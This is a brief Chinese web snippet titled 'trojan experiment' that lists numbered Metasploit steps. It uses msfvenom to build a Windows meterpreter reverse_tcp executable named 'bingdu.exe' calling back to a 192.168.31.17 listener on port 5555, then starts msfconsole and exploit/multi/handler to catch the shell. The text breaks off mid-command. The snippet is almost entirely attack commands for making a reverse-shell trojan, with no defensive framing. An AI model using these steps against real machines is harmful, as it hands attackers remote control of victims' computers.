木馬實驗

第一步:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.17 lport=5555 -f exe >/root/Desktop/bingdu.exe 第二步:msfconsole 第三步:use exploit/multi/handler 第四步:set payload windows/meterpreter/reverse
相關文章
相關標籤/搜索